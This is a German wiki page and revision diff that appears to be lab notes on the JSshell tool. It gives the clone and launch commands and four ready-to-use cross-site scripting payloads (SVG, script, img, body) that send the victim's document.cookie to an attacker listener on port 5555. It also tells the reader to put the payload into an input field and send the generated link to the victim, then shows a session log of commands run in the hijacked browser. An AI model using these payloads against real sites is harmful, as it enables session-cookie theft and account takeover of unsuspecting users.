Jsshell: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(Die Seite wurde neu angelegt: „ =git clone= *git clone https://github.com/shelld3v/JSshell/ *cd JSshell/ *chmod +x jsh.py =start= *./jsh.py -g -p 5555 -s 10.85.70.1 <pre> __ |(_ _ |_…“) |
(→start) |
||
| Zeile 5: | Zeile 5: | ||
*chmod +x jsh.py | *chmod +x jsh.py | ||
=start= | =start= | ||
| − | *./jsh.py -g -p 5555 -s 10. | + | *./jsh.py -g -p 5555 -s 10.0.10.101 |
<pre> | <pre> | ||
__ | __ | ||
| Zeile 13: | Zeile 13: | ||
Payloads: | Payloads: | ||
| − | - SVG: <svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10. | + | - SVG: <svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.0.10.101:5555/?"+document.cookie},1010)> |
| − | - SCRIPT: <script>setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10. | + | - SCRIPT: <script>setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.0.10.101:5555/?"+document.cookie},1010)</script> |
| − | - IMG: <img src=x onerror=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10. | + | - IMG: <img src=x onerror=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.0.10.101:5555/?"+document.cookie},1010)> |
| − | - BODY: <body onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10. | + | - BODY: <body onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.0.10.101:5555/?"+document.cookie}></body> |
Listening on [any] 5555 for incoming JS shell ... | Listening on [any] 5555 for incoming JS shell ... | ||
</pre> | </pre> | ||
| + | |||
=Payload= | =Payload= | ||
*Payload muss ins Eingabefeld | *Payload muss ins Eingabefeld | ||
Version vom 29. Juli 2021, 13:20 Uhr
git clone
- git clone https://github.com/shelld3v/JSshell/
- cd JSshell/
- chmod +x jsh.py
start
- ./jsh.py -g -p 5555 -s 10.0.10.101
__
|(_ _ |_ _ | |
\_|__)_> | |(/_ | |
v3.1
Payloads:
- SVG: <svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.0.10.101:5555/?"+document.cookie},1010)>
- SCRIPT: <script>setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.0.10.101:5555/?"+document.cookie},1010)</script>
- IMG: <img src=x onerror=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.0.10.101:5555/?"+document.cookie},1010)>
- BODY: <body onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.0.10.101:5555/?"+document.cookie}></body>
Listening on [any] 5555 for incoming JS shell ...
Payload
- Payload muss ins Eingabefeld
- Generierter Link wird zum Opfer geschickt
Die Shell
Listening on [any] 5555 for incoming JS shell ... Got JS shell from [10.85.70.1] port 53146 to orville 5555 >>> var test = 'hacked by xinux' >>> confirm(test) >>> prompt(document.cookie)
Auf dem Client
